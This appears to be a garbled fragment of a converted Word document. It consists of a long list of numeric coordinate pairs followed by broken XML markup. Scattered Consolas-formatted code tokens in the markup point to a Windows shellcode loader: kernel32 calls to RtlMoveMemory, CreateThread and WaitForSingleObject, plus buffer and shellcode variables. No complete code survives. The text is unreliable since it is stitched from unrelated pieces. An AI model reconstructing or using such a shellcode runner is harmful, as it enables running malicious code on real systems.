369,3026,2369,3026,2370,3026,2370,3026,2371,3026,2371,3026,2372,3026,2372,3026,2373,3026,2373,3026,2374,3026,2375,3026,2376,3026,2376,3026,2377,3026,2378,3026,2379,3026,2380,3026,2381,3026,2382,3026,2383,3026,2384,3026,2385,3026,2386,3026,2388,3026,2389,3026,2390,3026,2392,3026,2393,3026,2395,3026,2396,3026,2398,3026,2400,3026,2401,3026,2403,3026,2405,3026,2407,3026,2409,3026,2411,3026,2413,3026,2415,3026,2417,3026,2419,3026,2422,3026,2424,3026,2427,3026,2429,3026,2432,3026,2434,3026,2437,3026,2440,3026,2443,3026,2446,3026,2449,3026,2452,3026,2455,3026,2458,3026,2461,3026,2465,3026,2468,3026,2472,3026,2476,3026,2479,3026,2483,3026,2487,3026,2491,3026,2495,3026,2499,3026,2503,3026,2508,3026,2512,3026,2517,3026,2521,3026,2526,3026,2531,3026,2535,3026,2540,3026,2546,3026,2551,3026,2556,3026,2561,3026,2567,3026,2572,3026,2578,3026,2584,3026,2589,3026,2595,3026,2602,3026,2608,3026,2614,3026,2620,3026,2620,3026,2620,3026,2620,3026,2620,3026,2620,3026,2620,3026,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3025,2620,3024,2620,3024,2620,3024,2620,3024,2620,3024,2620,3024,2620,3023,2620,3023,2620,3023,2620,3023,2620,3022,2620,3022,2620,3022,2620,3022,2620,3021,2620,3021,2620,3021,2620,3020,2620,3020,2620,3019,2620,3019,2620,3019,2620,3018,2620,3018,2620,3017,2620,3017,2620,3016,2620,3016,2620,3015,2620,3014,2620,3014,2620,3013,2620,3012,2620,3012,2620,3011,2620,3010,2620,3009,2620,3009,2620,3008,2620,3007,2620,3006,2620,3005,2620,3004,2620,3003,2620,3002,2620,3001,2620,3000,2620,2999,2620,2998,2620,2997,2620,2995,2620,2994,2620,2993,2620,2992,2620,2990,2620,2989,2620,2988,2620,2986,2620,2985,2620,2983,2620,2982,2620,2980,2620,2979,2620,2977,2620,2975,2620,2974,2620,2972,2620,2970,2620,2968,2620,2966,2620,2964,2620,2962,2620,2960,2620,2958,2620,2956,2620,2954,2620,2952,2620,2950,2620,2948,2620,2945,2620,2943,2620,2941,2620,2938,2620,2936,2620,2933,2620,2931,2620,2928,2620,2925,2620,2923,2620,2920,2620,2917,2620,2914,2620,2911,2620,2908,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2620,2905,2619,2905,2619,2905,2619,2905,2619,2905,2619,2905,2618,2905,2618,2905,2618,2905,2618,2905,2617,2905,2617,2905,2617,2905,2616,2905,2616,2905,2615,2905,2615,2905,2614,2905,2614,2905,2613,2905,2613,2905,2612,2905,2611,2905,2611,2905,2610,2905,2609,2905,2608,2905,2607,2905,2607,2905,2606,2905,2605,2905,2604,2905,2603,2905,2601,2905,2600,2905,2599,2905,2598,2905,2596,2905,2595,2905,2594,2905,2592,2905,2591,2905,2589,2905,2588,2905,2586,2905,2584,2905,2582,2905,2581,2905,2579,2905,2577,2905,2575,2905,2573,2905,2571,2905,2568,2905,2566,2905,2564,2905,2561,2905,2559,2905,2556,2905,2554,2905,2551,2905,2548,2905,2546,2905,2543,2905,2540,2905,2537,2905,2534,2905,2531,2905,2527,2905,2524,2905,2521,2905,2517,2905,2514,2905,2510,2905,2506,2905,2502,2905,2499,2905,2495,2905,2491,2905,2486,2905,2482,2905,2478,2905,2473,2905,2469,2905,2464,2905,2460,2905,2455,2905,2450,2905,2445,2905,2440,2905,2435,2905,2430,2905,2424,2905,2419,2905,2413,2905,2408,2905,2402,2905,2396,2905,2390,2905,2384,2905,2378,2905,2372,2905,2365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Function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new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kernel32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[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'RtlMoveMemory'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call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ptr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buf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hellcode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size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22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43</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="11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44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thread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Function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new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kernel32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[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'CreateThread'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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6847" w:firstLine="15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>call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ptr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46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47</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="132" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="157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48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Function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new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kernel32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[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'WaitForSingleObject'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call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thread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96c38"/>
          <w:spacing w:val="2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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1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)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2" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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